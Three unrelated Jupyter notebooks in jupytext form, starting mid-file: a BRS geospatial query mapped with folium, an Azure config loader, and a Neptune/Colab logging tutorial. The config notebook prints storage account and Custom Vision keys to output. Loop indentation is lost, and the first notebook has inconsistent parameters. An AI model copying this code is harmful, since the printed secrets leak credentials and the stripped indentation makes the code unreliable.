# Find the top 10 regions sized 50km*50km that contains the highest number of employees( f is numberOfEmployees) working in production of pasta.
topk=20
eps=0.5
keywordsColumn="ATECO"
keywords="10.73"
f="numberOfEmployees"
dist = True
table = "BRS"
keywordsColumn2 = ""
keywords2 = ""
data = {'topk' : topk, 'eps' : eps, 'f' : f, 'input' : table, "keywordsColumn" : keywordsColumn, "keywords" : keywords,"keywordsColumn2":keywordsColumn2,"keywords2":keywords2,"dist":dist}
response = requests.get(BRS_URL, params=data)
print(response.text)
# ## Initialize the map and visualize the output regions
res = json.loads(response.text)
results_geojson={"type":"FeatureCollection","features":[]}
for region in res:
results_geojson['features'].append({"type": "Feature", "geometry": { "type": "Point", "coordinates": region['center']},
"properties": {
"id": region['rank'],
"score": region['score']
}})
m = folium.Map(
location=[44.629635,10.563514999999999],
tiles='Stamen Toner',
zoom_start=11
)
gdf = GeoDataFrame.from_features(results_geojson['features'])
gdf.crs = {'init': 'epsg:4326'}
gdf['geometry'] = gdf.buffer(data['eps']/2).envelope
threshold_scale = Natural_Breaks(gdf[value_field], k=num_bins).bins.tolist()
threshold_scale.insert(0, gdf[value_field].min())
choropleth = folium.Choropleth(gdf, data=gdf, columns=[id_field, value_field],
key_on='feature.properties.{}'.format(id_field),
fill_color=fill_color, fill_opacity=fill_opacity,
threshold_scale=4).add_to(m)
fields = list(gdf.columns.values)
fields.remove('geometry')
tooltip = folium.features.GeoJsonTooltip(fields=fields)
choropleth.geojson.add_child(tooltip)
m
# ## ---------------------------------------------------------------------------------------------------------
# ## Identify areas with a high concentration of restaurants or hotels
# This is example of applying filter on two columns at the same time where it identifies top 10 hotspots in Pisa province (look at the keywordsColumn) for number of (f in null) restaurants, ice-cream parlour, pastry shop, etc (look at the keywordsColumn2).
table = "BRS"
topk = 10
eps = 0.01
f = "null"
dist = True
keywordsColumn = "null"
keywords = "null"
keywordsColumn2 = ""
keywords2 = ""
data = {'topk' : topk, 'eps' : eps, 'f' : f, 'input' : table, "keywordsColumn" : keywordsColumn, "keywords" : keywords,"keywordsColumn2":keywordsColumn2,"keywords2":keywords2,"dist":dist}
response = requests.get(BRS_URL, params=data)
print(response.text[:-22])
# ## Initialize the map and visualize the output regions
res = json.loads(response.text[:-22])
results_geojson={"type":"FeatureCollection","features":[]}
for region in res:
results_geojson['features'].append({"type": "Feature", "geometry": { "type": "Point", "coordinates": region['center']},
"properties": {
"id": region['rank'],
"score": region['score']
}})
m = folium.Map(
location=[43.71682982000001,10.401120675000001],
tiles='Stamen Toner',
zoom_start=11
)
gdf = GeoDataFrame.from_features(results_geojson['features'])
gdf.crs = {'init': 'epsg:4326'}
gdf['geometry'] = gdf.buffer(data['eps']/2).envelope
threshold_scale = Natural_Breaks(gdf[value_field], k=num_bins).bins.tolist()
threshold_scale.insert(0, gdf[value_field].min())
choropleth = folium.Choropleth(gdf, data=gdf, columns=[id_field, value_field],
key_on='feature.properties.{}'.format(id_field),
fill_color=fill_color, fill_opacity=fill_opacity,
threshold_scale=threshold_scale).add_to(m)
fields = list(gdf.columns.values)
fields.remove('geometry')
tooltip = folium.features.GeoJsonTooltip(fields=fields)
choropleth.geojson.add_child(tooltip)
m
# ## Remove Tables
# To remove the intermediate tables which are downloaded form proteus
response = requests.get(RemoveTables_URL)
print(response.text)
|
BRS_Folium.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import io, os
from dotenv import load_dotenv
from pathlib import Path
env_path = Path(os.getcwd()).parent / '.env'
print(env_path)
load_dotenv(dotenv_path=env_path, verbose=True)
# %run AzureStorage.ipynb
# +
healthy_habitat_ai_storage_account_name=os.getenv('HEALTHY_HABITAT_AI_STORAGE_ACCOUNT_NAME')
print(healthy_habitat_ai_storage_account_name)
healthy_habitat_ai_storage_account_key=os.getenv('HEALTHY_HABITAT_AI_STORAGE_ACCOUNT_KEY')
print(healthy_habitat_ai_storage_account_key)
healthy_habitat_ai_processed_table_name = 'processed'
print(healthy_habitat_ai_processed_table_name)
custom_vision_training_key=os.getenv('CUSTOM_VISION_TRAINING_KEY')
print(custom_vision_training_key)
custom_vision_para_grass_project_id=os.getenv('CUSTOM_VISION_PARA_GRASS_PROJECT_ID')
print(custom_vision_para_grass_project_id)
custom_vision_magpie_geese_project_id=os.getenv('CUSTOM_VISION_MAGPIE_GEESE_PROJECT_ID')
print(custom_vision_magpie_geese_project_id)
# -
|
notebooks/Common.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="GG3_2HyRVY4Y" tags=["header", "comment"]
# # Introduction
# + [markdown] id="3wSDx9alU7Zx" tags=["comment"]
# This guide will show you how to:
#
# * Install ```neptune-client```,
# * Connect Neptune to your Colab notebook and create the first run,
# * Log simple metrics to Neptune and explore them in the UI.
# + [markdown] id="FUaDrmRu-h3k"
# # Before you start
#
# Make sure that:
# * you have an account with both [Google](https://support.google.com/accounts/answer/27441?hl=en) and [Neptune](https://neptune.ai/register)
# * you have [created a project](https://app.gitbook.com/@neptune-ai/s/docs-re-positioning/administration/workspace-project-and-user-management/projects#create-project) from the Neptune UI that you will use for tracking metadata.
#
# **Tip:**<br>
# Registering with Neptune and creating a project is optional in case you are just trying out the application as an 'ANONYMOUS' user.
# + [markdown] id="0NQaVXuoWA-E" tags=["header", "installation"]
# # Install ```neptune-client``` and import `neptune`
# + id="wmpN4W8wQ7MI" tags=["installation"]
# ! pip install neptune-client
# + id="quJ_tJDk7R3e"
import neptune.new as neptune
# + [markdown] id="7LFLtV5R5JKT" tags=["header"]
# # Initialize Neptune
# + [markdown] id="xoD3U3V_HUzy" tags=["comment"]
# Connect your script to Neptune and create a new run.
# + [markdown] id="xrjGGLs6HUzy" tags=["comment"]
# Basically, you tell Neptune:
#
# * **who you are**: your Neptune `api_token`
# * **where you want to send your data**: your Neptune `project`.
#
# At this point, you will have a new run in Neptune. From now on you will use `run` to log metadata to it.
# + [markdown] id="wEb6l4x8ZYlN" tags=["header", "exclude"]
# ## Get your personal ```api_token``` to initialize Neptune
# + [markdown] id="abBT8VERkz6d"
# **Note:**<br>
# There are a few special, public projects to show how Neptune works. For those projects, you can use the 'ANONYMOUS' api token and log as a public user `neptuner`.
#
# For example:
# ```python
# run = neptune.init(api_token='<PASSWORD>',
# project='common/neptune-and-google-colab')
# ```
# + [markdown] id="YXeWd99OHUz2" tags=["comment", "exclude"]
# Get your [Neptune API token](https://docs.neptune.ai/getting-started/installation#authentication) and pass it to Neptune:
# 
#
# The preferred way of doing this is by using the ```getpass()``` method so that your token remains private even if you share the notebook.
# + id="FXPlKmjC10MG" tags=["code", "exclude"]
from getpass import getpass
api_token = getpass("Enter your private Neptune API token: ")
# -
# You can log as an anonymous user `neptuner` with `api_token='<PASSWORD>'`
# + [markdown] id="TQZAqPw5apot" tags=["header", "exclude"]
# ## Initialize your project
#
# Remember to [create a new project](https://docs.neptune.ai/administration/workspace-project-and-user-management/projects#create-project) from the UI that you will use for metadata tracking.
# + id="4k_jZnnFwwW8" tags=["code", "exclude"]
workspace = "your_neptune_username"
project_name = "neptune-and-google-colab"
project = workspace + "/" + project_name
# if you are using ANONYMOUS api token, log to the project= 'common/neptune-and-google-colab'
# project = 'common/neptune-and-google-colab'
print(project)
# + [markdown] id="iGmC-Ybultmr"
# **Tip:** The `project_name` of a project can be found under its Settings → Properties
# 
# + id="Y_fHH8I7ls5H"
run = neptune.init(project=project, api_token=api_token)
# + [markdown] id="VnSWXRbXHUz3" tags=["comment", "exclude"]
# Click on the link above to open this run in Neptune. For now it is empty but keep the tab with run open to see what happens next.
# + [markdown] id="rhVnTl3THUz4" tags=["comment"]
# Runs can be viewed as dictionary-like structures - **namespaces** - that you can define in your code. You can apply a hierarchical structure to your metadata that will be reflected in the UI as well. Thanks to this you can easily organize your metadata in a way you feel is most convenient.
# + [markdown] id="pk4ZgmW9Q7Mg" tags=["header"]
# # Log metadata during training
# + [markdown] id="0uyhflfLQ7Mg" tags=["comment"]
# Log metrics or losses under a name of your choice. You can log one or multiple values.
#
# Now run the cell below, and switch over to the Neptune UI to view the live logging.
# + id="jZdLObUSQ7Mi" tags=["code"]
from time import sleep
params = {"learning_rate": 0.1}
# log params
run["parameters"] = params
# log name and append tags
run["sys/name"] = "colab-example"
run["sys/tags"].add(["colab", "simple"])
# log loss during training
for epoch in range(132):
sleep(0.1) # to see logging live
run["train/loss"].log(0.97 ** epoch)
run["train/loss-pow-2"].log((0.97 ** epoch) ** 2)
# log train and validation scores
run["train/accuracy"] = 0.95
run["valid/accuracy"] = 0.93
# log files/artifacts
# ! echo "Welcome to Neptune" > file.txt
run["artifacts/sample"].upload("file.txt") # file will be uploaded as sample.txt
# -
# The snippet above logs:
#
# * `parameters` with just one field: learning rate,
# * name of run and two tags,
# * `train/loss` and `train/loss-pow-2` as series of numbers, visualized as charts in UI,
# * `train/accuracy` and `valid/accuracy` as single values
# * `file.txt` which will be visible under All Metadata/artifacts as sample.txt
# **Tip:**<br>
# To view the structure of a run, use the `print_structure()` method.
# + pycharm={"name": "#%%\n"}
run.print_structure()
# + [markdown] id="XSHLD6AkI7LW"
# # Stop logging
# <font color=red>**Warning:**</font><br>
# Once you are done logging, you should stop tracking the run using the `stop()` method.
# This is needed only while logging from a notebook environment. While logging through a script, Neptune automatically stops tracking once the script has completed execution.
# + id="Zgh3NwDoJAuG"
run.stop()
# + [markdown] id="mRhOAcS0Q7Mm" tags=["comment"]
# # Explore the run in the Neptune UI
#
# 
#
# Go to the `All metadata` and `Charts` sections of the Neptune UI to see them. You can also check an [example run](https://app.neptune.ai/o/common/org/showroom/e/SHOW-37/charts)
#
# 
#
# **Tip:**
#
# Neptune automatically logs the hardware consumption during the run.
#
# You can see it in the `Monitoring` section of the Neptune UI.
#
# 
# + [markdown] id="had9MNRtQ7Mr" tags=["comment"]
# # Conclusion
#
# You’ve learned how to:
# * Install `neptune-client`,
# * Connect Neptune to your Google Colab notebook and create a run,
# * Log metadata to Neptune,
# * See your metrics parameters and scores,
# * See hardware consumption during the run.
# + [markdown] id="_3ibcYhPQ7Mr" tags=["comment"]
# # What's next
#
# Now that you know how to create runs and log metrics, you can learn:
#
# * [How to log other types of metadata to Neptune](https://docs.neptune.ai/you-should-know/logging-and-managing-runs-results/logging-runs-data#what-objects-can-you-log-to-neptune)
# * [How to download runs data from Neptune](https://docs.neptune.ai/user-guides/logging-and-managing-runs-results/downloading-runs-data)
# * [How to connect Neptune to the ML framework you are using](https://docs.neptune.ai/essentials/integrations)
|
integrations-and-supported-tools/colab/Neptune_Colab.ipynb
|